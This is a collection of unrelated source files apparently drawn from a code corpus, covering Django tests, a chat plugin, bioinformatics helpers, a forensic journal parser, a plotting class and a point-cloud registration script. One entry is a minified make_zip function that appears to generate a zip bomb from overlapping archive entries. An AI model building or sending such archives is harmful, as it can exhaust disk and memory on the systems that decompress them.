def test_price_per_unit_histogram_with_practice(self):
response = self.client.get(
'/practice/P87629/0202010F0AAAAAA/price_per_unit/')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['highlight_name'],
'1/ST Andrews Medical Practice')
self.assertEqual(response.context['date'].strftime('%Y-%m-%d'),
'2014-11-01')
bubble_data_url = response.context['bubble_data_url']
parsed_url = urlparse(bubble_data_url)
q = parse_qs(parsed_url.query)
self.assertEqual(q, {
'format': ['json'],
'bnf_code': ['0202010F0AAAAAA'],
'highlight': ['P87629'],
'date': ['2014-11-01'],
})
|
the-stack_106_23800 | """
Repeats the last word of the last message in the conversation, and use it in
an annoying “C’est toi le” sentence.
Installation
------------
You only have to load the plugin:
.. code-block:: none
/load stoi
.. glossary::
/stoi
**Usage:** ``/stoi``
"""
from poezio.plugin import BasePlugin
from poezio import tabs
import string
from poezio import xhtml
import random
char_we_dont_want = string.punctuation + ' ’„“”…«»'
class Plugin(BasePlugin):
def init(self):
for tab_type in (tabs.MucTab, tabs.PrivateTab, tabs.ConversationTab):
self.api.add_tab_command(
tab_type,
'stoi',
handler=self.stoi,
help="Repeats the last word of the last "
"message in the conversation, and "
"use it in an annoying “C’est toi "
"le” sentence.",
short='C’est toi le stoi.')
def stoi(self, args):
messages = self.api.get_conversation_messages()
if not messages:
# Do nothing if the conversation doesn’t contain any message
return
last_message = messages[-1]
txt = xhtml.clean_text(last_message.txt)
for char in char_we_dont_want:
txt = txt.replace(char, ' ')
if txt.strip():
last_word = txt.split()[-1]
else:
last_word = "vide"
intro = "C'est toi " if random.getrandbits(1) else "Stoi "
if last_word[0] in 'aeiouAEIOUÀàÉéÈè':
msg = intro + ('l’%s' % last_word)
else:
msg = intro + ('le %s' % last_word)
self.api.send_message(msg)
|
the-stack_106_23802 | # warning: minified
from struct import pack as F
from functools import reduce
G=lambda m,v:reduce(lambda i,j:i^j,[j*(v>>i&1) for i,j in enumerate(m)])
def make_zip(f,num_files,compressed_size):
A,H,B,I,a,o=(1<<32)-1,num_files,compressed_size,[1<<A for A in range(33)],range(8),[0]*8
for n in a:
for b in a:o[n]=o[n]>>1^3988292384*((1<<n>>b^o[n])&1)
C,D=B*1032-14447,o+I[:24]+[A+1];K=C
while C:
if C&1:I=[G(I,A)for A in D]
D=[G(D,A)for A in D];C>>=1
L=~G(I,2*A+1)&A;J=f.write(F('<QLHLLLLQLH',85966670672,8,0,L,B,K,1,36536642864,1409003712,25695)+b'\x0b'+b'\0'*(B-15)+b'`');M=J
for E in range(H):N=str(E).encode();J+=f.write(F('<QQLLLHQQ',5629585467198288,524288,L,B,K,len(N),0,0)+N)
f.write(F('<QHHLLH',101010256,H,H,J-M,M,0))
|
the-stack_106_23803 | import numpy as np
import pandas as pd
from typing import List
from anndata import AnnData
import logging
logger = logging.getLogger("pegasus")
def search_genes(
data: AnnData,
gene_list: List[str],
rec_key: str = "de_res",
measure: str = "percentage",
) -> pd.DataFrame:
"""Extract and display gene expressions for each cluster from an `anndata` object.
This function helps to see marker expressions in clusters via the interactive python environment.
Parameters
----------
data: ``anndata.AnnData``
Annotated data matrix containing the expression matrix and differential expression results.
gene_list: ``List[str]``
A list of gene symbols.
rec_key: ``str``, optional, default: ``"de_res"``
Keyword of DE analysis result stored in ``data.varm``.
measure : ``str``, optional, default: ``"percentage"``
Can be either ``"percentage"`` or ``"mean_logExpr"``:
* ``percentage`` shows the percentage of cells expressed the genes;
* ``mean_logExpr`` shows the mean log expression.
Returns
-------
``pandas.DataFrame``
A data frame containing marker expressions in each cluster.
Examples
--------
>>> results = pg.search_genes(adata, ['CD3E', 'CD4', 'CD8'])
"""
columns = [x for x in data.varm[rec_key].dtype.names if x.endswith(f":{measure}")]
df = pd.DataFrame(data=data.varm[rec_key][columns], index=data.var_names)
return df.reindex(index=gene_list)
def search_de_genes(
data: AnnData,
gene_list: List[str],
rec_key: str = "de_res",
de_test: str = "fisher",
de_alpha: float = 0.05,
thre: float = 1.5,
) -> pd.DataFrame:
"""Extract and display differential expression analysis results of markers for each cluster.
This function helps to see if markers are up or down regulated in each cluster via the interactive python environment:
* ``++`` indicates up-regulated and fold change >= threshold;
* ``+`` indicates up-regulated but fold change < threshold;
* ``--`` indicates down-regulated and fold change <= 1 / threshold;
* ``-`` indicates down-regulated but fold change > 1 / threshold;
* ``?`` indicates not differentially expressed.
Parameters
----------
data: ``anndata.Anndata``
Annotated data matrix containing the expression matrix and differential expression results.
gene_list: ``List[str]``
A list of gene symbols.
rec_key: ``str``, optional, default: ``"de_res"``
Keyword of DE analysis result stored in ``data.varm``.
de_test : ``str``, optional, default: ``"fisher"``
Differential expression test to look at, could be either ``t``, ``fisher`` or ``mwu``.
de_alpha : ``float``, optional, default: ``0.05``
False discovery rate.
thre : ``float``, optional, default: ``1.5``
Fold change threshold to determine if the marker is a strong DE (``++`` or ``--``) or weak DE (``+`` or ``-``).
Returns
-------
``pandas.DataFrame``
A data frame containing marker differential expression results for each cluster.
Examples
--------
>>> df = pegasus.misc.search_de_genes(adata, ['CD3E', 'CD4', 'CD8'], thre = 2.0)
"""
columns = [
x for x in data.varm[rec_key].dtype.names if x.endswith(f":{de_test}_qval")
]
df_de = pd.DataFrame(data.varm[rec_key][columns], index=data.var_names)
df_de = df_de.reindex(index=gene_list)
columns = [
x
for x in data.varm[rec_key].dtype.names
if (
x.endswith(":percentage_fold_change")
if de_test == "fisher"
else x.endswith(":log2FC")
)
]
df_fc = pd.DataFrame(data.varm[rec_key][columns], index=data.var_names)
df_fc = df_fc.reindex(index=gene_list)
if de_test != "fisher":
df_fc = np.exp(df_fc)
results = np.zeros((len(gene_list), len(columns)), dtype=np.dtype("U4"))
results[:] = "?"
results[np.isnan(df_de)] = "NaN"
results[(df_de <= de_alpha).values & (df_fc > 1.0).values] = "+"
results[(df_de <= de_alpha).values & (df_fc >= thre).values] = "++"
results[(df_de <= de_alpha).values & (df_fc < 1.0).values] = "-"
results[(df_de <= de_alpha).values & (df_fc <= 1.0 / thre).values] = "--"
clusts = [x.rpartition(":")[2] for x in columns]
df = pd.DataFrame(data=results, index=gene_list, columns=clusts)
return df
def show_attributes(
input_file: str,
show_attributes: bool,
show_gene_attributes: bool,
show_values_for_attributes: str,
) -> None:
""" Show data attributes. For command line use.
"""
# data = read_input(input_file, mode="r")
# if show_attributes:
# print(
# "Available sample attributes in input dataset: {0}".format(
# ", ".join(data.obs.columns.values)
# )
# )
# if show_gene_attributes:
# print(
# "Available gene attributes in input dataset: {0}".format(
# ", ".join(data.var.columns.values)
# )
# )
# if not show_values_for_attributes is None:
# for attr in show_values_for_attributes.split(","):
# print(
# "Available values for attribute {0}: {1}.".format(
# attr, ", ".join(np.unique(data.obs[attr]))
# )
# )
def perform_oneway_anova(
data: AnnData,
glist: List[str],
restriction_vec: List[str],
group_str: str,
fdr_alpha: float = 0.05,
res_key: str = None,
) -> pd.DataFrame:
"""Perform one way ANOVA on a subset of cells (restricted by restriction_vec) grouped by group_str and control FDR at fdr_alpha.
Parameters
----------
data : `anndata` object
An `anndata` object containing the expression matrix.
glist : `list[str]`
A list of gene symbols.
restriction_vec : `list[str]`
A vector of restrictions for selecting cells. Each restriction takes the format of attr:value,value,value
group_str : `str`
How to group selected cells for ANOVA analysis. If group_str is for pseudotime, it has two formats. 1) 'pseudotime:time:n', which divides cells by equal pseudotime invertal; 2) 'pseudotime:size:n' divides cells by equal number of cells.
fdr_alpha : `float`, optional (default: 0.05)
False discovery rate.
res_key : `str`, optional (default: None)
Store results into data using res_key, the grouping information is stored in obs and the results is stored in uns.
Returns
-------
`pandas.DataFrame`
Results for genes that pass FDR control.
Examples
--------
>>> results = misc.perform_oneway_anova(data, ['CD3E', 'CD4', 'CD8'], [], 'pseudotime:size:10')
"""
from scipy.stats import f_oneway
from statsmodels.stats.multitest import fdrcorrection as fdr
selected = np.ones(data.shape[0], dtype=bool)
for rest_str in restriction_vec:
attr, value_str = rest_str.split(":")
values = value_str.split(",")
selected = selected & np.isin(data.obs[attr], values)
gene_list = np.array(glist)
gene_list = gene_list[np.isin(gene_list, data.var_names)]
ngene = gene_list.size
newdat = data[selected, :][:, gene_list].copy()
newdat.X = newdat.X.toarray()
group_values = group_str.split(":")
group_names = []
col_names = []
ngr = 0
group_idx = None
if group_values[0] == "pseudotime":
assert len(group_values) == 3
div_by = group_values[1]
ngr = int(group_values[2])
group_idx = np.zeros((ngr, newdat.shape[0]), dtype=bool)
pseudotimes = newdat.obs["pseudotime"].values
min_t = pseudotimes.min()
max_t = pseudotimes.max()
if div_by == "time":
interval = (max_t - min_t) / ngr
left = min_t - 1e-5
for i in range(ngr):
right = min_t + interval * (i + 1)
name = "({:.2f}, {:.2f}]".format(left if left >= 0 else 0.0, right)
group_names.append(name)
group_idx[i] = (pseudotimes > left) & (pseudotimes <= right)
left = right
else:
assert div_by == "size"
ords = np.argsort(pseudotimes)
quotient = ords.size // ngr
residule = ords.size % ngr
fr = 0
for i in range(ngr):
to = fr + quotient + (i < residule)
name = "[{:.2f}, {:.2f}]".format(
pseudotimes[ords[fr]], pseudotimes[ords[to - 1]]
)
group_names.append(name)
group_idx[i][ords[fr:to]] = True
fr = to
else:
assert len(group_values) == 2
group_attr = group_values[0]
tmp_str = group_values[1]
groups_str = tmp_str.split(";")
ngr = len(groups_str)
group_idx = np.zeros((ngr, newdat.shape[0]), dtype=bool)
for i, gstr in enumerate(groups_str):
name, values = gstr.split("~")
group_names.append(name)
group_idx[i] = np.isin(newdat.obs[group_attr], values.split(","))
for i in range(ngr):
print("Group {} has {} cells.".format(group_names[i], group_idx[i].sum()))
np.warnings.filterwarnings("ignore")
stats = np.zeros((ngene, 3 + ngr * 2))
for i in range(ngene):
arr_list = []
for j in range(ngr):
arr = newdat.X[group_idx[j], i]
stats[i, 3 + j * 2] = arr.mean()
stats[i, 3 + j * 2 + 1] = (arr > 0).sum() * 100.0 / arr.size
arr_list.append(arr)
stats[i, 0], stats[i, 1] = f_oneway(*arr_list)
if np.isnan(stats[i, 0]):
stats[i, 0] = 0.0
stats[i, 1] = 1.0
passed, stats[:, 2] = fdr(stats[:, 1])
cols = ["fstat", "pval", "qval"]
for i in range(ngr):
cols.extend([group_names[i] + "_mean", group_names[i] + "_percent"])
raw_results = pd.DataFrame(stats, columns=cols, index=gene_list)
results = raw_results[raw_results["qval"] <= fdr_alpha]
results = results.sort_values("qval")
if res_key is not None:
data.uns[res_key] = raw_results
data.obs[res_key] = "background"
for i in range(ngr):
idx = np.zeros(data.shape[0], dtype=bool)
idx[selected] = group_idx[i]
data.obs.loc[idx, res_key] = group_names[i]
return results
|
the-stack_106_23804 | # -*- coding: utf-8 -*-
"""Parser for Systemd journal files."""
from __future__ import unicode_literals
import lzma
from lz4 import block as lz4_block
from dfdatetime import posix_time as dfdatetime_posix_time
from plaso.containers import events
from plaso.containers import time_events
from plaso.lib import definitions
from plaso.lib import errors
from plaso.lib import specification
from plaso.parsers import dtfabric_parser
from plaso.parsers import manager
class SystemdJournalEventData(events.EventData):
"""Systemd journal event data.
Attributes:
body (str): message body.
hostname (str): hostname.
pid (int): process identifier (PID).
reporter (str): reporter.
"""
DATA_TYPE = 'systemd:journal'
def __init__(self):
"""Initializes event data."""
super(SystemdJournalEventData, self).__init__(data_type=self.DATA_TYPE)
self.body = None
self.hostname = None
self.pid = None
self.reporter = None
class SystemdJournalParser(dtfabric_parser.DtFabricBaseParser):
"""Parses Systemd Journal files."""
NAME = 'systemd_journal'
DESCRIPTION = 'Parser for Systemd Journal files.'
_DEFINITION_FILE = 'systemd_journal.yaml'
_OBJECT_COMPRESSED_FLAG_XZ = 1
_OBJECT_COMPRESSED_FLAG_LZ4 = 2
_OBJECT_TYPE_UNUSED = 0
_OBJECT_TYPE_DATA = 1
_OBJECT_TYPE_FIELD = 2
_OBJECT_TYPE_ENTRY = 3
_OBJECT_TYPE_DATA_HASH_TABLE = 4
_OBJECT_TYPE_FIELD_HASH_TABLE = 5
_OBJECT_TYPE_ENTRY_ARRAY = 6
_OBJECT_TYPE_TAG = 7
_SUPPORTED_FILE_HEADER_SIZES = frozenset([208, 224, 240])
def __init__(self):
"""Initializes a parser object."""
super(SystemdJournalParser, self).__init__()
self._maximum_journal_file_offset = 0
def _ParseDataObject(self, file_object, file_offset):
"""Parses a data object.
Args:
file_object (dfvfs.FileIO): a file-like object.
file_offset (int): offset of the data object relative to the start
of the file-like object.
Returns:
bytes: data.
Raises:
ParseError: if the data object cannot be parsed.
"""
data_object_map = self._GetDataTypeMap('systemd_journal_data_object')
try:
data_object, _ = self._ReadStructureFromFileObject(
file_object, file_offset, data_object_map)
except (ValueError, errors.ParseError) as exception:
raise errors.ParseError((
'Unable to parse data object at offset: 0x{0:08x} with error: '
'{1!s}').format(file_offset, exception))
if data_object.object_type != self._OBJECT_TYPE_DATA:
raise errors.ParseError('Unsupported object type: {0:d}.'.format(
data_object.object_type))
if data_object.object_flags not in (
0, self._OBJECT_COMPRESSED_FLAG_XZ, self._OBJECT_COMPRESSED_FLAG_LZ4):
raise errors.ParseError('Unsupported object flags: 0x{0:02x}.'.format(
data_object.object_flags))
# The data is read separately for performance reasons.
data_size = data_object.data_size - 64
data = file_object.read(data_size)
if data_object.object_flags & self._OBJECT_COMPRESSED_FLAG_XZ:
data = lzma.decompress(data)
elif data_object.object_flags & self._OBJECT_COMPRESSED_FLAG_LZ4:
uncompressed_size_map = self._GetDataTypeMap('uint32le')
try:
uncompressed_size = self._ReadStructureFromByteStream(
data, file_offset + 64, uncompressed_size_map)
except (ValueError, errors.ParseError) as exception:
raise errors.ParseError((
'Unable to parse LZ4 uncompressed size at offset: 0x{0:08x} with '
'error: {1!s}').format(file_offset + 64, exception))
data = lz4_block.decompress(data[8:], uncompressed_size=uncompressed_size)
return data
def _ParseEntryArrayObject(self, file_object, file_offset):
"""Parses an entry array object.
Args:
file_object (dfvfs.FileIO): a file-like object.
file_offset (int): offset of the entry array object relative to the start
of the file-like object.
Returns:
systemd_journal_entry_array_object: entry array object.
Raises:
ParseError: if the entry array object cannot be parsed.
"""
entry_array_object_map = self._GetDataTypeMap(
'systemd_journal_entry_array_object')
try:
entry_array_object, _ = self._ReadStructureFromFileObject(
file_object, file_offset, entry_array_object_map)
except (ValueError, errors.ParseError) as exception:
raise errors.ParseError((
'Unable to parse entry array object at offset: 0x{0:08x} with error: '
'{1!s}').format(file_offset, exception))
if entry_array_object.object_type != self._OBJECT_TYPE_ENTRY_ARRAY:
raise errors.ParseError('Unsupported object type: {0:d}.'.format(
entry_array_object.object_type))
if entry_array_object.object_flags != 0:
raise errors.ParseError('Unsupported object flags: 0x{0:02x}.'.format(
entry_array_object.object_flags))
return entry_array_object
def _ParseEntryObject(self, file_object, file_offset):
"""Parses an entry object.
Args:
file_object (dfvfs.FileIO): a file-like object.
file_offset (int): offset of the entry object relative to the start
of the file-like object.
Returns:
systemd_journal_entry_object: entry object.
Raises:
ParseError: if the entry object cannot be parsed.
"""
entry_object_map = self._GetDataTypeMap('systemd_journal_entry_object')
try:
entry_object, _ = self._ReadStructureFromFileObject(
file_object, file_offset, entry_object_map)
except (ValueError, errors.ParseError) as exception:
raise errors.ParseError((
'Unable to parse entry object at offset: 0x{0:08x} with error: '
'{1!s}').format(file_offset, exception))
if entry_object.object_type != self._OBJECT_TYPE_ENTRY:
raise errors.ParseError('Unsupported object type: {0:d}.'.format(
entry_object.object_type))
if entry_object.object_flags != 0:
raise errors.ParseError('Unsupported object flags: 0x{0:02x}.'.format(
entry_object.object_flags))
return entry_object
def _ParseEntryObjectOffsets(self, file_object, file_offset):
"""Parses entry array objects for the offset of the entry objects.
Args:
file_object (dfvfs.FileIO): a file-like object.
file_offset (int): offset of the first entry array object relative to
the start of the file-like object.
Returns:
list[int]: offsets of the entry objects.
"""
entry_array_object = self._ParseEntryArrayObject(file_object, file_offset)
entry_object_offsets = list(entry_array_object.entry_object_offsets)
while entry_array_object.next_entry_array_offset != 0:
entry_array_object = self._ParseEntryArrayObject(
file_object, entry_array_object.next_entry_array_offset)
entry_object_offsets.extend(entry_array_object.entry_object_offsets)
return entry_object_offsets
def _ParseJournalEntry(self, file_object, file_offset):
"""Parses a journal entry.
This method will generate an event per ENTRY object.
Args:
file_object (dfvfs.FileIO): a file-like object.
file_offset (int): offset of the entry object relative to the start
of the file-like object.
Returns:
dict[str, objects]: entry items per key.
Raises:
ParseError: when an object offset is out of bounds.
"""
entry_object = self._ParseEntryObject(file_object, file_offset)
# The data is read separately for performance reasons.
entry_item_map = self._GetDataTypeMap('systemd_journal_entry_item')
file_offset += 64
data_end_offset = file_offset + entry_object.data_size - 64
fields = {'real_time': entry_object.real_time}
while file_offset < data_end_offset:
try:
entry_item, entry_item_data_size = self._ReadStructureFromFileObject(
file_object, file_offset, entry_item_map)
except (ValueError, errors.ParseError) as exception:
raise errors.ParseError((
'Unable to parse entry item at offset: 0x{0:08x} with error: '
'{1!s}').format(file_offset, exception))
file_offset += entry_item_data_size
if entry_item.object_offset < self._maximum_journal_file_offset:
raise errors.ParseError(
'object offset should be after hash tables ({0:d} < {1:d})'.format(
entry_item.object_offset, self._maximum_journal_file_offset))
event_data = self._ParseDataObject(file_object, entry_item.object_offset)
event_string = event_data.decode('utf-8')
key, value = event_string.split('=', 1)
fields[key] = value
return fields
@classmethod
def GetFormatSpecification(cls):
"""Retrieves the format specification.
Returns:
FormatSpecification: format specification.
"""
format_specification = specification.FormatSpecification(cls.NAME)
format_specification.AddNewSignature(b'LPKSHHRH', offset=0)
return format_specification
def ParseFileObject(self, parser_mediator, file_object):
"""Parses a Systemd journal file-like object.
Args:
parser_mediator (ParserMediator): parser mediator.
file_object (dfvfs.FileIO): a file-like object.
Raises:
UnableToParseFile: when the header cannot be parsed.
"""
file_header_map = self._GetDataTypeMap('systemd_journal_file_header')
try:
file_header, _ = self._ReadStructureFromFileObject(
file_object, 0, file_header_map)
except (ValueError, errors.ParseError) as exception:
raise errors.UnableToParseFile(
'Unable to parse file header with error: {0!s}'.format(
exception))
if file_header.header_size not in self._SUPPORTED_FILE_HEADER_SIZES:
raise errors.UnableToParseFile(
'Unsupported file header size: {0:d}.'.format(
file_header.header_size))
data_hash_table_end_offset = (
file_header.data_hash_table_offset +
file_header.data_hash_table_size)
field_hash_table_end_offset = (
file_header.field_hash_table_offset +
file_header.field_hash_table_size)
self._maximum_journal_file_offset = max(
data_hash_table_end_offset, field_hash_table_end_offset)
entry_object_offsets = self._ParseEntryObjectOffsets(
file_object, file_header.entry_array_offset)
for entry_object_offset in entry_object_offsets:
if entry_object_offset == 0:
continue
try:
fields = self._ParseJournalEntry(file_object, entry_object_offset)
except errors.ParseError as exception:
parser_mediator.ProduceExtractionWarning((
'Unable to parse journal entry at offset: 0x{0:08x} with '
'error: {1!s}').format(entry_object_offset, exception))
return
event_data = SystemdJournalEventData()
event_data.body = fields.get('MESSAGE', None)
event_data.hostname = fields.get('_HOSTNAME', None)
event_data.reporter = fields.get('SYSLOG_IDENTIFIER', None)
if event_data.reporter and event_data.reporter != 'kernel':
event_data.pid = fields.get('_PID', fields.get('SYSLOG_PID', None))
date_time = dfdatetime_posix_time.PosixTimeInMicroseconds(
timestamp=fields['real_time'])
event = time_events.DateTimeValuesEvent(
date_time, definitions.TIME_DESCRIPTION_WRITTEN)
parser_mediator.ProduceEventWithEventData(event, event_data)
manager.ParsersManager.RegisterParser(SystemdJournalParser)
|
the-stack_106_23807 | from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class X(_BaseTraceHierarchyType):
# class properties
# --------------------
_parent_path_str = "volume.slices"
_path_str = "volume.slices.x"
_valid_props = {"fill", "locations", "locationssrc", "show"}
# fill
# ----
@property
def fill(self):
"""
Sets the fill ratio of the `slices`. The default fill value of
the `slices` is 1 meaning that they are entirely shaded. On the
other hand Applying a `fill` ratio less than one would allow
the creation of openings parallel to the edges.
The 'fill' property is a number and may be specified as:
- An int or float in the interval [0, 1]
Returns
-------
int|float
"""
return self["fill"]
@fill.setter
def fill(self, val):
self["fill"] = val
# locations
# ---------
@property
def locations(self):
"""
Specifies the location(s) of slices on the axis. When not
specified slices would be created for all points of the axis x
except start and end.
The 'locations' property is an array that may be specified as a tuple,
list, numpy array, or pandas Series
Returns
-------
numpy.ndarray
"""
return self["locations"]
@locations.setter
def locations(self, val):
self["locations"] = val
# locationssrc
# ------------
@property
def locationssrc(self):
"""
Sets the source reference on Chart Studio Cloud for
`locations`.
The 'locationssrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["locationssrc"]
@locationssrc.setter
def locationssrc(self, val):
self["locationssrc"] = val
# show
# ----
@property
def show(self):
"""
Determines whether or not slice planes about the x dimension
are drawn.
The 'show' property must be specified as a bool
(either True, or False)
Returns
-------
bool
"""
return self["show"]
@show.setter
def show(self, val):
self["show"] = val
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
fill
Sets the fill ratio of the `slices`. The default fill
value of the `slices` is 1 meaning that they are
entirely shaded. On the other hand Applying a `fill`
ratio less than one would allow the creation of
openings parallel to the edges.
locations
Specifies the location(s) of slices on the axis. When
not specified slices would be created for all points of
the axis x except start and end.
locationssrc
Sets the source reference on Chart Studio Cloud for
`locations`.
show
Determines whether or not slice planes about the x
dimension are drawn.
"""
def __init__(
self,
arg=None,
fill=None,
locations=None,
locationssrc=None,
show=None,
**kwargs,
):
"""
Construct a new X object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of
:class:`plotly.graph_objs.volume.slices.X`
fill
Sets the fill ratio of the `slices`. The default fill
value of the `slices` is 1 meaning that they are
entirely shaded. On the other hand Applying a `fill`
ratio less than one would allow the creation of
openings parallel to the edges.
locations
Specifies the location(s) of slices on the axis. When
not specified slices would be created for all points of
the axis x except start and end.
locationssrc
Sets the source reference on Chart Studio Cloud for
`locations`.
show
Determines whether or not slice planes about the x
dimension are drawn.
Returns
-------
X
"""
super(X, self).__init__("x")
if "_parent" in kwargs:
self._parent = kwargs["_parent"]
return
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.volume.slices.X
constructor must be a dict or
an instance of :class:`plotly.graph_objs.volume.slices.X`"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
self._validate = kwargs.pop("_validate", True)
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("fill", None)
_v = fill if fill is not None else _v
if _v is not None:
self["fill"] = _v
_v = arg.pop("locations", None)
_v = locations if locations is not None else _v
if _v is not None:
self["locations"] = _v
_v = arg.pop("locationssrc", None)
_v = locationssrc if locationssrc is not None else _v
if _v is not None:
self["locationssrc"] = _v
_v = arg.pop("show", None)
_v = show if show is not None else _v
if _v is not None:
self["show"] = _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
|
the-stack_106_23811 | from django.core.management.base import BaseCommand
from django.contrib.auth.management import create_permissions as _create_permissions
from django_extensions.management.utils import signalcommand
try:
from django.apps import apps as django_apps
get_models = lambda: None
get_app = django_apps.get_app_config
get_all_apps = django_apps.get_app_configs
def create_permissions(app, models, verbosity):
_create_permissions(app, verbosity)
except ImportError:
from django.db.models import get_models, get_app
django_apps = None
def get_all_apps():
apps = set()
for model in get_models():
apps.add(get_app(model._meta.app_label))
return apps
create_permissions = _create_permissions
class Command(BaseCommand):
args = '<app app ...>'
help = 'reloads permissions for specified apps, or all apps if no args are specified'
@signalcommand
def handle(self, *args, **options):
apps = set()
if not args:
apps = get_all_apps()
else:
for arg in args:
apps.add(get_app(arg))
for app in apps:
create_permissions(app, get_models(), int(options.get('verbosity', 3)))
|
the-stack_106_23812 | import time
import numpy as np
import torch
import torch.nn as nn
import open3d as o3d
import h5py
import math
import sklearn
import copy
from sklearn.neighbors import KDTree
from PIL import Image
import matplotlib.pyplot as plt
def show_point_cloud(src_, src_corr_, ref_, ref_corr_):
src = src_.copy()
src_corr = src_corr_.copy()
ref = ref_.copy()
ref_corr = ref_corr_.copy()
ref[:,1] = ref[:,1] + 2.5
ref_corr[:,1] = ref_corr[:,1] + 2.5
src_pcd = o3d.geometry.PointCloud()
src_corr_pcd = o3d.geometry.PointCloud()
ref_pcd = o3d.geometry.PointCloud()
ref_corr_pcd = o3d.geometry.PointCloud()
src_pcd.points = o3d.utility.Vector3dVector(src)
ref_pcd.points = o3d.utility.Vector3dVector(ref)
src_corr_pcd.points = o3d.utility.Vector3dVector(src_corr)
ref_corr_pcd.points = o3d.utility.Vector3dVector(ref_corr )
ref_pcd.paint_uniform_color([1, 0, 0.651]) # 蓝色
# src_corr_pcd.paint_uniform_color([1, 0.706, 0]) # 黄色
src_pcd.paint_uniform_color([0, 0.651, 0.929]) # 红色
line_size = src_corr.shape[0]
line_src = np.arange(0, 2 * line_size, 2) # 这个代表所有偶数
rand_idxs = np.random.choice(line_size, math.ceil(line_size / 3), replace=False)
# print('line_src',line_src)
line_src = line_src[rand_idxs].reshape(rand_idxs.shape[0], 1)
# print('line_src',line_src)
line_ref = line_src + 1
# print('line_ref',line_ref)
lines = np.concatenate([line_ref, line_src], -1).reshape(-1, 2)
# print('lines',lines)
colors = [[1, 0, 0]]
# triangle_points=np.concatenate([data['points_ref'][1, :, :3].detach().cpu().numpy()+1,data['points_src'][1, :, :3].detach().cpu().numpy()],-1)
triangle_points = np.concatenate([src_corr, ref_corr ], -1)
triangle_points = triangle_points.reshape(-1, 3)
# print('triangle_points',triangle_points.shape)
line_pcd = o3d.geometry.LineSet()
line_pcd.lines = o3d.utility.Vector2iVector(lines)
line_pcd.colors = o3d.utility.Vector3dVector(colors)
# line_pcd.paint_uniform_color([1, 0.706, 0])
line_pcd.points = o3d.utility.Vector3dVector(triangle_points)
o3d.visualization.draw_geometries([line_pcd, src_pcd, ref_pcd], window_name='line_pcd src_pcd src_corr_pcd')
# o3d.visualization.draw_geometries([src_corr_pcd, ref_pcd], window_name='src_corr_pcd ref_pcd')
# src_pcd.transform(transform)
# src_corr_pcd.points = o3d.utility.Vector3dVector(weighted_ref)
# o3d.visualization.draw_geometries([src_corr_pcd, src_pcd], window_name='src_corr_pcd src_pcd.transform(T)')
#
# ref_pcd.points = o3d.utility.Vector3dVector(ref)
# o3d.visualization.draw_geometries([src_pcd, ref_pcd], window_name='src_pcd.transform(T) ref_pcd')
def draw_registration_result(source, target, src_color, tgt_color):
src_pcd = o3d.geometry.PointCloud()
ref_pcd = o3d.geometry.PointCloud()
src_pcd.points = o3d.utility.Vector3dVector(source)
ref_pcd.points = o3d.utility.Vector3dVector(target)
src_pcd.colors = o3d.utility.Vector3dVector(src_color)
ref_pcd.colors = o3d.utility.Vector3dVector(tgt_color)
# src_pcd.paint_uniform_color([1, 0.706, 0])
# ref_pcd.paint_uniform_color([0, 0.651, 0.929])
o3d.visualization.draw_geometries([src_pcd, ref_pcd])
def draw_registration_result_no_blocking(source, target,vis):
vis.update_geometry(source)
vis.poll_events()
vis.update_renderer()
def get_npy_data(filename, index):
all_data = np.load(filename, allow_pickle=True)
# print(len(all_data))
# xyz_src = torch.from_numpy(all_data[index * 3])
# feat_src = torch.from_numpy(all_data[index * 3 + 2])
# xyz_ref = torch.from_numpy(all_data[index * 3 + 3])
# feat_ref = torch.from_numpy(all_data[index * 3 + 5])
xyz = all_data[index * 4]
normal = all_data[index * 4 + 1]
feat = all_data[index * 4 + 2]
color = all_data[index * 4 + 3]
return xyz, normal, feat, color
def calGrad(point,normal,feature,kdTree):
# n * 3; n * 3 ; n * d
N = point.shape[0]
d = feature.shape[1]
grads = np.zeros([N,3,d])
for i in range(N):
pt = point[i,:].reshape(1,-1)
nt = normal[i,:].reshape(1,-1)
ft = feature[i,:].reshape(1,-1)
_, idx = kdTree.query(pt, k=20, return_distance=True)
# idx_ = np.reshape(idx,(-1,1))
# neighbor_ = point[idx_, :]
# neighbor = np.reshape(neighbor_, (N,-1, 3))
neighbor_pt = point[idx, :].reshape(-1,3)
neighbor_ft = feature[idx,:].reshape(-1,d)
proj_pt = neighbor_pt - (neighbor_pt - pt) @ nt.T * nt
A = proj_pt - pt
b = neighbor_ft - ft
A = np.concatenate((A,nt),axis=0)
b = np.concatenate((b,np.zeros(d).reshape(1,d)))
x = np.linalg.inv(A.T@A)@A.T@b
grads[i,:,:] = x
return grads
def pt2plTrans(source,target,corr, weights):
ps = source.point[corr[:, 0], :]
pt = target.point[corr[:, 1], :]
nt = target.normal[corr[:, 1], :]
geo_A = np.concatenate((np.cross(ps, nt), nt), axis=1) * weights
geo_b = np.sum((ps-pt)*nt, axis=1,keepdims=True) * weights
Ja = geo_A
res = geo_b
vecTrans = -np.linalg.inv(Ja.T@Ja)@Ja.T@res
vecTrans = np.squeeze(vecTrans)
cx = np.cos(vecTrans[0])
cy = np.cos(vecTrans[1])
cz = np.cos(vecTrans[2])
sx = np.sin(vecTrans[0])
sy = np.sin(vecTrans[1])
sz = np.sin(vecTrans[2])
R = np.array([[cy*cz, sx*sy*cz-cx*sz, cx*sy*cz+sx*sz],
[cy*sz, cx*cz+sx*sy*sz, cx*sy*sz-sx*cz],
[-sy, sx*cy, cx*cy]])
t = vecTrans[3:]
transform = np.identity(4)
transform[0:3, 0:3] = R
transform[0:3, 3] = t
t = t.reshape(3, 1)
return R, t, transform
class PointCloud:
def __init__(self,point,normal,feature):
self.point = point
self.normal = normal
self.feature = feature
def file2matrix(filename):
fr = open(filename)
numberOfLines = len(fr.readlines()) #get the number of lines in the file
trans = np.eye(4) #prepare matrix to return
